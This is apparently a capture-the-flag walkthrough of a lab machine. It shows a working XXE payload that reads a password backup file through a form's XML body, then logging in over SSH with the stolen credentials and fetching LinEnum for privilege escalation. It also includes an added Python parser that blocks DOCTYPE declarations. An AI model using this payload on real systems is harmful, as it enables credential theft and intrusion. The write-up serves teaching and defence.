MACHINE IP: 10.1.1.30
START TIME: 1:40 PM
I don't know why it showed port 7007 as filtered, because when I checked that port I got
hmm… So we have some accessible directories. Let's see what we can find in them.
I got nothing interesting in img/, but in backup/ we got another URL.
I couldn't figure out what this path was referring to until I saw the XML function in the source of the page.
This is basically a reference to an XXE attack. The path we got from backup/ is telling us where the passwords are kept; in other words, we have to use XXE to read that file/path.
Now, if we capture the request sent while submitting the form, we will find the following XML in the request body:

    <?xml version="1.0" encoding="UTF-8"?>
    <root>
      <name>name</name>
      <tel>tel</tel>
      <email>email</email>
      <password>passswrd</password>
    </root>
Instead of sending this, we can edit the body to be:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///home/lord/password_backup.txt" >
    ]>
    <root>
      <name>me</name>
      <tel>666</tel>
      <email>&xxe;</email>
      <password></password>
    </root>
This is an XXE attack: the parser expands the external entity &xxe; with the contents of the file and echoes it back in the email field.
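For contrast, here is how the form's backend could have defused this. This is an added example, not code from the box or from the writeup: a parser built on Python's stdlib expat that rejects any request body carrying a DOCTYPE (so no entities can be declared at all) and refuses external entity references as a second layer. The two sample bodies are the ones captured above; the function names are my own.

```python
import xml.parsers.expat

# Request body captured from the legitimate form submission (from the writeup).
BENIGN_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?> <root> <name>name</name> '
    '<tel>tel</tel> <email>email</email> <password>passswrd</password> </root>'
)

# The modified body: declares an external entity pointing at a local file.
XXE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > '
    '<!ENTITY xxe SYSTEM "file:///home/lord/password_backup.txt" >]> '
    '<root> <name>me</name> <tel>666</tel> <email>&xxe;</email> <password></password> </root>'
)


class ForbiddenDtdError(ValueError):
    """Raised when an untrusted document tries to declare a DTD."""


def parse_form_xml(body: str) -> dict:
    """Parse a flat <root><field>value</field>...</root> form body into a dict.

    A DOCTYPE anywhere in the document aborts parsing: the form never needs one,
    and without a DTD there is no place to declare the entity an XXE relies on.
    """
    fields = {}
    stack = []
    text = []

    def start_doctype(name, system_id, public_id, has_internal_subset):
        # Fires before any entity inside the DTD is processed.
        raise ForbiddenDtdError(f"DOCTYPE '{name}' rejected: DTDs are not allowed in form submissions")

    def external_entity_ref(context, base, system_id, public_id):
        # Defense in depth: returning 0 makes expat fail instead of fetching the resource.
        return 0

    def start_element(name, attrs):
        stack.append(name)
        text.clear()

    def char_data(data):
        text.append(data)

    def end_element(name):
        stack.pop()
        if stack:  # a child of <root>: record its text
            fields[name] = "".join(text).strip()
        text.clear()

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.EndElementHandler = end_element
    parser.Parse(body, True)
    return fields


def is_safe_submission(body: str) -> bool:
    """True if the body parses without a DTD, False if it was rejected as an XXE attempt."""
    try:
        parse_form_xml(body)
        return True
    except ForbiddenDtdError:
        return False


if __name__ == "__main__":
    print(parse_form_xml(BENIGN_BODY))
    print("modified body accepted:", is_safe_submission(XXE_BODY))
```

The same effect is what libraries such as defusedxml give you with `forbid_dtd=True`; the point of doing it by hand here is to show that the check has to happen at the DOCTYPE, before the parser ever sees the `SYSTEM` entity, and that a parser which silently expands &xxe; is the whole vulnerability.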
Okay, so now we have the username lord and the password.
Just ssh into the machine using those credentials and get the user flag.
- get LinEnum, make a script with nano